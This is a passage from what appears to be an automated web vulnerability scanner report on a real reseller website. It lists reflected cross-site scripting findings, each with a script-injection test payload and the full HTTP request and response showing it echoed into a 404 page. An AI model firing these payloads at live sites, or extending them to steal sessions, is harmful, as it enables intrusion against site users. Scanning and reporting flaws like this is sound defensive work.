<p>The requested URL /detail/339e678<script>alert(1)</script>7aaf067b74e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2301. http://www.resellerbase.com/detail/33/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91ab7<script>alert(1)</script>62f127af741 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/search.php91ab7<script>alert(1)</script>62f127af741?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php91ab7<script>alert(1)</script>62f127af741?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2302. http://www.resellerbase.com/detail/33/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/33/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7d2bb<a>579816113a9 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/33/search.php?keyword=search...&Submit3=Search7d2bb<a>579816113a9&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php?keyword=search...&Submit3=Search7d2bb<a>579816113a9&opt=2 was not found on this server.</p>
...[SNIP]...

2.2303. http://www.resellerbase.com/detail/33/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/33/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5d6af<a>778d6dcac9e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/33/search.php?keyword=search...5d6af<a>778d6dcac9e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php?keyword=search...5d6af<a>778d6dcac9e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2304. http://www.resellerbase.com/detail/33/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dccaf<script>alert(1)</script>0e9bb3b8a93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/search.php?keyword=search...&Submit3=Search&opt=2&dccaf<script>alert(1)</script>0e9bb3b8a93=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php?keyword=search...&Submit3=Search&opt=2&dccaf<script>alert(1)</script>0e9bb3b8a93=1 was not found on this server.</p>
...[SNIP]...

2.2305. http://www.resellerbase.com/detail/33/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/33/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 983da<a>e250313b801 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/33/search.php?keyword=search...&Submit3=Search&opt=2983da<a>e250313b801 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php?keyword=search...&Submit3=Search&opt=2983da<a>e250313b801 was not found on this server.</p>
...[SNIP]...

2.2306. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc8f7<script>alert(1)</script>922fe3f0686 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfc8f7<script>alert(1)</script>922fe3f0686/33/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfc8f7<script>alert(1)</script>922fe3f0686/33/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2307. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 44dee<script>alert(1)</script>7f6ef02cfb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3344dee<script>alert(1)</script>7f6ef02cfb3/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3344dee<script>alert(1)</script>7f6ef02cfb3/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2308. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b36ea<script>alert(1)</script>e9836bbb2b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themesb36ea<script>alert(1)</script>e9836bbb2b3/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themesb36ea<script>alert(1)</script>e9836bbb2b3/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2309. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e53b<script>alert(1)</script>b38759ea10d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos7e53b<script>alert(1)</script>b38759ea10d/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos7e53b<script>alert(1)</script>b38759ea10d/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2310. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 917f3<script>alert(1)</script>91f4ed5de0e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos/images917f3<script>alert(1)</script>91f4ed5de0e/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos/images917f3<script>alert(1)</script>91f4ed5de0e/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2311. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1aa8e<script>alert(1)</script>02d3c91d6fc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos/images/rating1aa8e<script>alert(1)</script>02d3c91d6fc/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos/images/rating1aa8e<script>alert(1)</script>02d3c91d6fc/0.gif was not found on this server.</p>
...[SNIP]...

2.2312. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c1640<script>alert(1)</script>8cc1c11f293 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos/images/rating/0.gifc1640<script>alert(1)</script>8cc1c11f293 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos/images/rating/0.gifc1640<script>alert(1)</script>8cc1c11f293 was not found on this server.</p>
...[SNIP]...

2.2313. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f40d<script>alert(1)</script>9303622313c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos/images/rating/0.gif?3f40d<script>alert(1)</script>9303622313c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos/images/rating/0.gif?3f40d<script>alert(1)</script>9303622313c=1 was not found on this server.</p>
...[SNIP]...

2.2314. http://www.resellerbase.com/detail/34/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa546<script>alert(1)</script>88bcc7a6084 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa546<script>alert(1)</script>88bcc7a6084/34/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa546<script>alert(1)</script>88bcc7a6084/34/ was not found on this server.</p>
...[SNIP]...

2.2315. http://www.resellerbase.com/detail/34/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4005f<script>alert(1)</script>ede5df7ac09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/344005f<script>alert(1)</script>ede5df7ac09/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/344005f<script>alert(1)</script>ede5df7ac09/ was not found on this server.</p>
...[SNIP]...

2.2316. http://www.resellerbase.com/detail/34/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0059<script>alert(1)</script>6bab41b87dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/?b0059<script>alert(1)</script>6bab41b87dd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/?b0059<script>alert(1)</script>6bab41b87dd=1 was not found on this server.</p>
...[SNIP]...

2.2317. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec075<script>alert(1)</script>23a5a7ba6a7db7cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailec075<script>alert(1)</script>23a5a7ba6a7db7cd7/34/rating.php?id=34&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailec075<script>alert(1)</script>23a5a7ba6a7db7cd7/34/rating.php?id=34&rating=5 was not found on this server.</p>
...[SNIP]...

2.2318. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f09b<script>alert(1)</script>f5de29211c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4f09b<script>alert(1)</script>f5de29211c2/34/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4f09b<script>alert(1)</script>f5de29211c2/34/rating.php was not found on this server.</p>
...[SNIP]...

2.2319. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 296f8<script>alert(1)</script>bfc6c2579f949b04e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/34296f8<script>alert(1)</script>bfc6c2579f949b04e/rating.php?id=34&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
